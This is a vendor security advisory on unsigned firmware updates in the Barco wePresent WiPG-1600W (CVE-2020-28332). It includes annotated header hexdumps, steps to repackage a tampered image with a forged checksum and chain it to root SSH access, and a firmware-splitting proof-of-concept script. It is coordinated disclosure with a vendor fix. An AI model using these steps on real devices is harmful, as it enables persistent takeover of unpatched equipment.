Barco wePresent WiPG-1600W Insecure Firmware Image Vulnerability

Title: Barco wePresent Insecure Firmware Image
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2020-009.txt


1. Vulnerability Details

     Affected Vendor: Barco
     Affected Product: wePresent WiPG-1600W
     Affected Version: 2.5.1.8, 2.5.0.25, 2.5.0.24, 2.4.1.19
     Platform: Embedded Linux
     CWE Classification: CWE-494: Download of Code Without Integrity Check
     CVE ID: CVE-2020-28332


2. Vulnerability Description

     The Barco wePresent firmware does not perform verification
     of digitally signed firmware updates and is susceptible to
     processing and installing modified/malicious images.

3. Technical Description

     The Barco wePresent firmware unpacks partially using
     binwalk. Using 'dd' it is possible to extract the 4 component
     files in the firmware. They are:

     - a 512 byte header
     - a cramfs file system
     - a uBoot
     - and a tar.gz'd set of files (where the /etc/shadow file lives)

     The initial attempt at modifying the firmware failed when the
     device computed a checksum and denied processing the modified
     firmware. Knowing that a checksum was used in validating
     firmware, the focus was on the header file. Most of the fields
     in the header file are text-based and easily identifiable.
     There were, however, fields whose purpose were not immediately
     obvious. After some thought and processing of the bytes, the
     following header file structure was identified. The following
     is hexdump output with comments interspersed.

     $ hexdump -C header
     00000000  61 77 2d 66 68 30 30 33  02 05 01 08 14 14 02 07  |aw-fh003........|
                                   (version=2.5.1.8)
                                                    (0x14 = 20; date = 2020/02/07
     00000010  61 77 69 6e 64 2e 57 69  50 47 2d 31 36 30 30 2e  |awind.WiPG-1600.|
     00000020  57 4d 38 37 35 30 00 00  00 00 00 00 00 00 00 00  |WM8750..........|
     00000030  57 50 53 00 00 00 00 00  00 00 00 00 00 00 00 00  |WPS.............|
     00000040  41 57 49 00 00 00 00 00  00 00 00 00 00 00 00 00  |AWI.............|
     00000050  64 65 66 61 75 6c 74 00  00 00 00 00 00 00 00 00  |default.........|
     00000060  f3 ec 90 07 08 22 ab cf  64 65 66 61 75 6c 74 00  |....."..default.|
              (0x0790ecf3 = 126938355 bytes = filesize of the firmware without the first 512 bytes, which is the header)
                          (0xcfab2208 = sum32 checksum of the firmware without the first 512 bytes, which is the header)
     00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
     00000080  61 77 2d 65 78 74 72 61  01 00 00 00 ff ff ff ff  |aw-extra........|
     00000090  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
     *
     00000200

     Generating a new firmware version involved gunzip'ing and
     untar'ing the filesystem, replacing the hash, and tar-gzip'ing
     back up. Once it is tar.gz, it is necessary to concatenate
     all parts of the new firmware together *without* the header
     file. Next, calculate the sum32 checksum on this file. With
     the new sum32 checksum and filesize of the tar.gz file, modify
     the new header file to look like:

     00000000  61 77 2d 66 68 30 30 33  02 05 01 09 14 14 02 07  |aw-fh003........|
     00000010  61 77 69 6e 64 2e 57 69  50 47 2d 31 36 30 30 2e  |awind.WiPG-1600.|
     00000020  57 4d 38 37 35 30 00 00  00 00 00 00 00 00 00 00  |WM8750..........|
     00000030  57 50 53 00 00 00 00 00  00 00 00 00 00 00 00 00  |WPS.............|
     00000040  41 57 49 00 00 00 00 00  00 00 00 00 00 00 00 00  |AWI.............|
     00000050  64 65 66 61 75 6c 74 00  00 00 00 00 00 00 00 00  |default.........|
     00000060  5f 2a 91 07 39 66 da cf  64 65 66 61 75 6c 74 00  |_*..9f..default.|
     00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
     00000080  61 77 2d 65 78 74 72 61  01 00 00 00 ff ff ff ff  |aw-extra........|
     00000090  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
     *
     00000200

     Now, concatenate the header file onto the new firmware to
     complete the firmware packaging. This new file can now be
     uploaded to the wePresent device.  After the firmware update,
     the device will revert back to the default admin password of
     "admin". The steps in KL-001-2020-007 (CVE-2020-28331) can
     be run again to re-enable SSH, and now ssh in with a known
     root password.

4. Mitigation and Remediation Recommendation

     The vendor has released an updated firmware (2.5.3.12) which
     remediates the described vulnerability. Firmware and release
     notes are available at:

     https://www.barco.com/en/support/software/R33050104


5. Credit

     This vulnerability was discovered by Jim Becher (@jimbecher) and
     Matt Bergin (@thatguylevel) of KoreLogic, Inc.


6. Disclosure Timeline

     2020.08.24 - KoreLogic submits vulnerability details to
                  Barco.
     2020.08.25 - Barco acknowledges receipt and the intention
                  to investigate.
     2020.09.21 - Barco notifies KoreLogic that this issue,
                  along with several others reported by KoreLogic,
                  will require more than the standard 45 business
                  day remediation timeline. Barco requests to delay
                  coordinated disclosure until 2020.12.11.
     2020.09.23 - KoreLogic agrees to 2020.12.11 coordinated disclosure.
     2020.09.25 - Barco informs KoreLogic of their intent to acquire
                  CVE number for this vulnerability.
     2020.11.09 - Barco shares CVE number with KoreLogic and announces
                  their intention to release the updated firmware
                  ahead of schedule, on 2020.11.11. Request that KoreLogic
                  delay public disclosure until 2020.11.20.
     2020.11.11 - Barco firmware release.
     2020.11.20 - KoreLogic public disclosure.


7. Proof of Concept

     $ more unpack-firmware.sh
     #!/bin/sh
     dd bs=512 if=$1 of=$1.header count=1
     dd bs=512 if=$1 of=$1.cromfs skip=1 count=10240
     dd bs=512 if=$1 of=$1.uboot skip=10241 count=6144
     dd bs=512 if=$1 of=$1.fs.tar.gz skip=16385

     $ ls -altr
     total 123972
     drwxr-xr-x 5 user user      4096 Jul 17 21:12 ..
     drwxr-xr-x 2 user user      4096 Jul 17 21:12 .
     -rw-r--r-- 1 user user 126938867 Jul 17 21:12 awind.WiPG-1600W.wm8750_2.5.1.8_20-02-07-1343.a2e02.nad

     $ ./unpack-firmware.sh awind.WiPG-1600W.wm8750_2.5.1.8_20-02-07-1343.a2e02.nad
     1+0 records in
     1+0 records out
     512 bytes copied, 0.000389048 s, 1.3 MB/s
     10240+0 records in
     10240+0 records out
     5242880 bytes (5.2 MB, 5.0 MiB) copied, 0.0501995 s, 104 MB/s
     6144+0 records in
     6144+0 records out
     3145728 bytes (3.1 MB, 3.0 MiB) copied, 0.0120293 s, 262 MB/s
     231542+1 records in
     231542+1 records out
     118549747 bytes (119 MB, 113 MiB) copied, 0.388187 s, 305 MB/s

     $ file *
     awind.WiPG-1600W.wm8750_2.5.1.8_20-02-07-1343.a2e02.nad:           data
     awind.WiPG-1600W.wm8750_2.5.1.8_20-02-07-1343.a2e02.nad.cromfs:    Linux Compressed ROM File System data, little
endian size 4452352 version #2 sorted_dirs CRC 0xd1b0b3fa, edition 0, 2359 blocks, 918 files
     awind.WiPG-1600W.wm8750_2.5.1.8_20-02-07-1343.a2e02.nad.fs.tar.gz: gzip compressed data, last modified: Fri Feb  7
05:57:05 2020, from Unix
     awind.WiPG-1600W.wm8750_2.5.1.8_20-02-07-1343.a2e02.nad.header:    data
     awind.WiPG-1600W.wm8750_2.5.1.8_20-02-07-1343.a2e02.nad.uboot:     u-boot legacy uImage, Linux-2.6.32.9-default,
Linux/ARM, OS Kernel Image (Not compressed), 2104776 bytes, Thu May 30 06:06:07 2019, Load Address: 0x00008000, Entry
Point: 0x00008000, Header CRC: 0xB224BB24, Data CRC: 0xD50B7080